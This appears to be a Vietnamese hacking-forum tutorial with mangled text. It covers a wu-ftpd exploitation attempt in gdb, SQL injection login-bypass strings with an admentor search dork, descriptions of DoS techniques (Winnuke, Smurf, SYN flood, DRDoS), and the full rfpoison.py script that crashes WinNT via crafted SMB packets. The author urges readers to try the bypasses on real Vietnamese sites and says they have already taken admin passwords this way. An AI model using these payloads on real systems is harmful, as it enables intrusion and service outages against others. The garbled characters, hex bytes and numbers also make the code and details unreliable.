ftp> ls ~{ <== lnh lit k th muc hin hnh .
22 Entering Passive Mode (12,0,0,1,21,20)
21 Service not available, remote server has closed connection
10 ? S 0:00 ftpd: accepting connections on port 21 chp nhn kt n cng 21
.
11 tty3 S 1:2 gdb /usr/sbin/wu.ftpd
22 ? S 0:00 ftpd:
sasha:anonymous/aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
22 tty3 R 0:00 bash -c ps ax | grep ftpd
(gdb) at 22
Attaching to program: /usr/sbin/wu.ftpd, process 22 <== khai thc li Wu.ftpd .
Symbols already loaded for /lib/libcrypt.so.1
Symbols already loaded for /lib/libnsl.so.1
Symbols already loaded for /lib/libresolv.so.2
Symbols already loaded for /lib/libpam.so.0
Symbols already loaded for /lib/libdl.so.2
Symbols already loaded for /lib/i/libc.so.
Symbols already loaded for /lib/ld-linux.so.2
Symbols already loaded for /lib/libnss_files.so.2
Symbols already loaded for /lib/libnss_nisplus.so.2
Symbols already loaded for /lib/libnss_nis.so.2
0x01 in __libc_read () from /lib/i/libc.so.
(gdb) c
Continuing.
Program received signal SGSEGV, Segmentation fault.
__libc_free (mem=0x1111) at malloc.c:313
313 in malloc.c
Vic khai thc ua li ny n nay ti test vn cha thnh cng ( chng bit
lm sai ch no ) . Vy ban no lm c hy post ln cho anh em bit nh .
Li Linux hin nay rt t ( c bit l i vi Redhat ), cc ban hy ch
i nu c li g mi th bn "L bo mt s cp nht ngay . Khai
thc chng nh th no th hi Mod un l bn , c bit l ban Leonhart
, cu ta sing tr li cc ban lm .
( Dua theo bi vit ca huynh Binhnx2000 )
3 . ) Tm hiu v SL njection :
_ SL njection l mt trong nhng kiu hack web ang dn tr nn ph bin hin
nay. Bng cch inject cc m SL uery/command vo input trc khi chuyn cho ng
dung web x l, ban c th login m khng cn username v password, thi hnh lnh
t xa, oat d liu v ly root ca SL server. Cng cu dng tn cng
l mt trnh duyt web bt k, chng han nh nternet Explorer, Netscape, Lynx,
...
_ Ban c th kim c trang Web bj li bng cch dng cc cng cu tm
kim kim cc trang cho php submit d liu . Mt s trang Web chuyn tham
s ua cc khu vuc n nn ban ph viewsource m thy c . VD ta xc
jnh c trang ny s dung Submit d liu nh nhn vo m m ta
viewsource :
CODE
<ORM action=Search/search.asp method=post>
<input type=hidden name=A value=C>
</ORM>
_ Kim tra th xem trang Web c bj li ny hay khng bng cch nhp vo login v
pass ln lt nh sau :
- Login: hi' or 1=1--
- Pass: hi' or 1=1--
Nu khng c ban th tip vi cc login v pass sau :
CODE
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Nu thnh cng, ban c th login vo m khng cn phi bit username v password
.
Li ny c dnh dng n uery nn nu ban no tng hc ua co s d
liu c th khai thc d dng chi bng cch nh cc lnh uery trn trnh
duyt ca cc ban . Nu cc ban mun tm hiu k cng hon v li ny c
th tm cc bi vit ca nhm vicky tm hiu thm .
3 . ) Mt VD v hack Web thng ua li admentor ( Mt dang ca li SL njection )
:
_ Trc tin ban vo google.com tm trang Web admentor bng t kho "allinurl :
admentor .
_ Thng thng ban s c kt u sau :
http://www.someserver.com/admentor/admin/admin.asp
_ Ban th nhp " ' or ''=' vo login v password :
CODE
Login : ' or ''='
Password : ' or ''='
_ Nu thnh cng ban s xm nhp vo Web bj li vi vai tr l admin .
_ Ta hy tm hiu v cch fix li ny nh :
+ Lc cc k tu c bit nh " ' " ~ \ bng cch chm vo javascrip oan
m sau :
CODE
function RemoveBad(strTemp)
{
strTemp = strTemp.replace(/\<|\>|\"|\'|\|\;|\(|\)|\&|\+|
\-/g,"");
return strTemp;
}
+ V gi n t bn trong ca asp script :
CODE
var login = var TempStr = RemoveBad
(Reuest.ueryString("login"));
var password = var TempStr = RemoveBad
(Reuest.ueryString("password"));
_ Vy l ta fix xong li .
_ Cc ban c th p dung cch hack ny cho cc trang Web khc c submit d liu ,
cc ban hy test th xem i , cc trang Web Vit Nam mnh bj nhiu lm , ti
kim c kha kh pass admin bng cch th ny ri ( nhng cng bo
h fix lai ) .
_ C nhiu trang khi login khng phi bng " ' or ''=' m bng cc nick name
c tht ng k trn trang Web , ta vo link "thnh vin kim nick ca
mt admin test th nh .
3 . ) DoS attack l g ? ( Denial Of Services Attack )
_ DoS attack ( djch l tn cng t chi djch vu ) l kiu tn cng rt li
hai , vi loai tn cng ny , ban chi cn mt my tnh kt ni nternet l
c th thuc hin vic tn cng c my tnh ca phong . thuc
cht ca DoS attack l hacker s chim dung mt lng ln ti nguyn trn
server ( ti nguyn c th l bng thng, b nh, cpu, a cng, ... ) lm
cho server khng th no p ng cc yu cu t cc my ca ngui khc ( my
ca nhng ngi dng bnh thng ) v server c th nhanh chng bj ngng
hoat ng, crash hoc reboot .
3 . ) Cc loai DoS attack hin ang c bit n v s dung :
a . ) Winnuke :
_DoS attack loai ny chi c th p dung cho cc my tnh ang chay Windowsx .
Hacker s gi cc gi tin vi d liu "Out of Band" n cng 13 ca my tnh
ch.( Cng 13 chnh l cng NetBOS, cng ny chi chp nhn cc gi tin c
c Out of Band c bt ) . Khi my tnh ca victim nhn c gi tin ny,
mt mn hnh xanh bo li s c hin thj ln vi nan nhn do chong
trnh ca Windows nhn c cc gi tin ny nhng n lai khng bit phn ng
vi cc d liu Out Of Band nh th no dn n h thng s bj crash .
b . ) Ping of Death :
_ kiu DoS attack ny , ta chi cn gi mt gi d liu c kch thc ln
thng ua lnh ping n my ch th h thng ca h s bj treo .
_ VD : ping l 000
c . ) Teardrop :
_ Nh ta bit , tt c cc d liu chuyn i trn mang t h thng
ngun n h thng ch u phi tri ua 2 u trnh : d liu s
c chia ra thnh cc mnh nh h thng ngun, mi mnh u phi c
mt gi trj offset nht jnh xc jnh vj tr ca mnh trong gi
d liu c chuyn i. Khi cc mnh ny n h thng ch, h thng
ch s dua vo gi trj offset sp xp cc mnh lai vi nhau theo th
tu ng nh ban u . Li dung so h , ta chi cn gi n h thng
ch mt loat gi packets vi gi trj offset chng cho ln nhau. H thng
ch s khng th no sp xp lai cc packets ny, n khng iu khin
c v c th bj crash, reboot hoc ngng hoat ng nu s lng gi
packets vi gi trj offset chng cho ln nhau u ln !
d . ) SYN Attack :
_ Trong SYN Attack, hacker s gi n h thng ch mt loat SYN packets vi
ja chi ip ngun khng c thuc. H thng ch khi nhn c cc SYN packets
ny s gi tr lai cc ja chi khng c thuc v ch nhn
thng tin phn hi t cc ja chi ip gi . V y l cc ja chi ip khng
c thuc, nn h thng ch s s ch i v ch v cn a cc "reuest"
ch i ny vo b nh , gy lng ph mt lng ng k b nh trn
my ch m ng ra l phi dng vo vic khc thay cho phi ch i thng tin
phn hi khng c thuc ny . Nu ta gi cng mt lc nhiu gi tin c ja
chi P gi nh vy th h thng s bj u ti dn n bj crash hoc
boot my tnh . == > nm du tay .
e . ) Land Attack :
_ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc ja chi ip
khng c thuc, hacker s dng chnh ja chi ip ca h thng nan nhn. iu
ny s tao nn mt vng lp v tn gia trong chnh h thng nan nhn ,
gia mt bn cn nhn thng tin phn hi cn mt bn th chng bao gi gi
thng tin phn hi i c . == > Gy ng p lng ng .
f . ) Smurf Attack :
_Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mang
khuch ai (s nghe lnh ca hacker) v h thng ca nan nhn. Hacker s
gi cc gi tin CMP n ja chi broadcast ca mang khuch ai. iu c
bit l cc gi tin CMP packets ny c ja chi ip ngun chnh l ja chi ip
ca nan nhn . Khi cc packets n c ja chi broadcast ca mang
khuch ai, cc my tnh trong mang khuch ai s tng rng my tnh nan
nhn gi gi tin CMP packets n v chng s ng loat gi tr lai h
thng nan nhn cc gi tin phn hi CMP packets. H thng my nan nhn s
khng chju ni mt khi lng khng l cc gi tin ny v nhanh chng bj
ngng hoat ng, crash hoc reboot. Nh vy, chi cn gi mt lng nh
cc gi tin CMP packets i th h thng mang khuch ai s khuch ai
lng gi tin CMP packets ny ln gp b . Ti l khuch ai phu thuc vo
s mang tnh c trong mang khuch a . Nhim vu ca cc hacker l c
chim c cng nhiu h thng mang hoc routers cho php chuyn truc tip
cc gi tin n ja chi broadcast khng ua ch lc ja chi ngun cc
u ra ca gi tin . C c cc h thng ny, hacker s d dng tin hnh
Smurf Attack trn cc h thng cn tn cng . == > mt my lm chng si nh ,
chuc my chum lai ta nh cho thua .
g . ) DP looding :
_ Cch tn cng DP i hi phi c 2 h thng my cng tham gia. Hackers s
lm cho h thng ca mnh i vo mt vng lp trao i cc d liu ua giao
thc DP. V gi mao ja chi ip ca cc gi tin l ja chi loopback (
12.0.0.1 ) , ri gi gi tin ny n h thng ca nan nhn trn cng DP echo
( ). H thng ca nan nhn s tr li lai cc messages do 12.0.0.1( chnh n
) gi n , kt u l n s i vng mt vng lp v tn. Tuy nhin, c
nhiu h thng khng cho dng ja chi loopback nn hacker s gi mao mt
ja chi ip ca mt my tnh no trn mang nan nhn v tin hnh ngp
lut DP trn h thng ca nan nhn . Nu ban lm cch ny khng thnh cng
th chnh my ca ban s bj y .
h . ) Tn cng DNS :
_ Hacker c th i mt li vo trn Domain Name Server ca h thng nan nhn
ri cho chi n mt website no ca hacker. Khi my khch yu cu DNS phn
tch ja chi bj xm nhp thnh ja chi ip, lp tc DNS ( bj hacker thay
i cache tam th ) s i thnh ja chi ip m hacker cho chi n
. Kt u l thay v phi vo trang Web mun vo th cc nan nhn s vo
trang Web do chnh hacker tao ra . Mt cch tn cng t chi djch vu tht hu
hiu !.
g . ) Distributed DoS Attacks ( DDos ) :
_ DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s
c thm nhp vo cc mang my tnh c bo mt km, sau ci ln cc
h thng ny chong trnh DDoS server. By gi cc hackers s hen nhau n
thi gian jnh s dng DDoS client kt ni n cc DDoS servers, sau
ng loat ra lnh cho cc DDoS servers ny tin hnh tn cng DDoS n h
thng nan nhn .
h . ) DRDoS ( The Distributed Reflection Denial of Service Attack ) :
_ y c l l kiu tn cng li hai nht v lm boot my tnh ca i
phong nhanh gn nht . Cch lm th cng tong tu nh DDos nhng thay v tn
cng bng nhiu my tnh th ng tn cng chi cn dng mt my tn cng
thng ua cc server ln trn th gii . Vn vi phong php gi mao ja
chi P ca victim , k tn cng s gi cc gi tin n cc server manh nht
, nhanh nht v c ng truyn rng nht nh Yahoo .v.v , cc server ny s
phn hi cc gi tin n ja chi ca victim . Vic cng mt lc nhn
c nhiu gi tin thng ua cc server ln ny s nhanh chng lm nghn
ng truyn ca my tnh nan nhn v lm crash , reboot my tnh . Cch
tn cng ny li hai ch chi cn mt my c kt ni nternet on gin
vi ng truyn bnh thng cng c th nh bt c h thng c
ng truyn tt nht th gi nu nh ta khng kjp ngn chn . Trang Web
HVA ca chng ta cng bj DoS va ri bi cch tn cng ny y .
0 . ) K thut DoS Web bng Python :
_ K thut ny chi c th s dung duy nht trn WinNT , v ban cn phi c
thi gian th my tnh ca nan nhn mi bj down c .
_ Ban hy download Pyphon tai http://www.python.org/ s dung .
_ Ban hy save oan m sau ln file rfpoison.py .
CODE
import string
import struct
from socket import
import sys
def a2b(s):
bytes = map(lambda x: string.atoi(x, 1),
string.split(s))
data = string.join(map(chr, bytes), '')
return data
def b2a(s):
bytes = map(lambda x: '.2x' x, map(ord, s))
return string.join(bytes, ' ')
# Yu cu tp hp NBSS
nbss_session = a2b("""
1 00 00 20 3 b
e 3 3 3 3
1 3 1 3 1 3 1 3 1 3 1 00 20
2 c 1
3 3 1 3 1 3 1 3 1 3 1 1 1 00 00 00
00 00
""")
# Tao SMB
crud = (
# Yu cu SMBnegprot
"""
ff 3 d 2 2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f 01 00 00 01 00 00 1 00 02 0 3
20 e f 2 b 20 0 2 f 2 1 d
20 31 2e 30 00 02 d 3 2 f 3 f 20
e f 2 b 3 20 31 2e 30 33 00 02 d
3 2 f 3 f 20 e f 2 b
3 20 33 2e 30 00 02 c 1 e d 1 e 31 2e 30
00 02 c d 31 2e 32 30 30 32 00 02 3 1 d
2 1 00 02 e 20 c 1 e d 1 e 20 31 2e
30 00 02 e 20 c d 20 30 2e 31 32 00
""",
# Yu cu setup SMB
"""
ff 3 d 2 3 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f 01 00 00 01 00 0d ff 00 00 00 ff
ff 02 00 f 01 00 00 00 00 01 00 00 00 00 00 00
00 00 00 00 00 1 00 00 00 f 2 b 2 f
0 00 e 00 3 1 d 2 1 00
""",
# Yu cu SMBtcon
"""
ff 3 d 2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 f 01 00 0 01 00 0 ff 00 00 00 00
00 01 00 1 00 00 c c 2a 3 d 2 3 2
2 c 0 3 2 00 0 3 00
""",
# Yu cu kh tao SMBnt
"""
ff 3 d 2 a2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 0 f 01 00 0 01 00 1 ff 00 00 00 00
0 00 0 00 00 00 00 00 00 00 f 01 02 00 00 00
00 00 00 00 00 00 00 00 00 00 03 00 00 00 01 00
00 00 00 00 00 00 02 00 00 00 00 0 00 c 3 2
3 3 00
""",
# yu cu bin djch SMB
"""
ff 3 d 2 2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 0 f 01 00 0 01 00 10 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 c
00 00 c 00 02 00 2 00 00 0 1 00 c 0
0 c 00 00 00 0 00 0b 00 10 00 00 00 00
00 00 01 00 00 00 30 1 30 1 00 00 00 00 01 00
00 00 00 00 01 00 c f 32 b 0 1 d3 01 12
a bf e e1 03 00 00 00 0 d a eb 1c
c 11 f e 0 00 2b 10 0 02 00 00 00
""",
# SMBtrans Reuest
"""
ff 3 d 2 2 00
00 00 00 0 01 00 00 00 00 00 00 00 00 00 00 00
00 00 00 0 f 01 00 0 01 00 10 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 c
00 00 c 00 02 00 2 00 00 0 1 00 c 0
0 c 00 00 00 0 00 00 03 10 00 00 00 00
00 00 02 00 00 00 00 00 00 00 00 0f 00 01 00
00 00 0d 00 00 00 00 00 00 00 0d 00 00 00 c 00
c 00 2a 00 3 00 d 00 2 00 3 00 00 2 00
00 00 2 00 00 00 00 00 01 00 00 00 01 00
00 00 00 00 00 00 ff ff ff ff 00 00 00 00
"""
)
crud = map(a2b, crud)
def smb_send(sock, data, type=0, flags=0):
d = struct.pack('!BBH', type, flags, len(data))
#print 'send:', b2a(d+data)
sock.send(d+data)
def smb_recv(sock):
s = sock.recv()
assert(len(s) == )
type, flags, length = struct.unpack('!BBH', s)
data = sock.recv(length)
assert(len(data) == length)
#print 'recv:', b2a(s+data)
return type, flags, data
def nbss_send(sock, data):
sock.send(data)
def nbss_recv(sock):
s = sock.recv()
assert(len(s) == )
return s
def main(host, port=13):
s = socket(A_NET, SOCK_STREAM)
s.connect(host, port)
nbss_send(s, nbss_session)
nbss_recv(s)
for msg in crud[:-1]:
smb_send(s, msg)
smb_recv(s)
smb_send(s, crud[-1]) # no response to this
s.close()
if __name__ == '__main__':
print 'Sending poison...',
main(sys.argv[1])
print 'done.'
c th lm down c server ca i phong ban cn phi c thi gian
DoS , nu khng c iu kin ch i tt nht ban khng nn s dung cch
ny . Nhng "vc th cho bit th c ng khng ?
em tip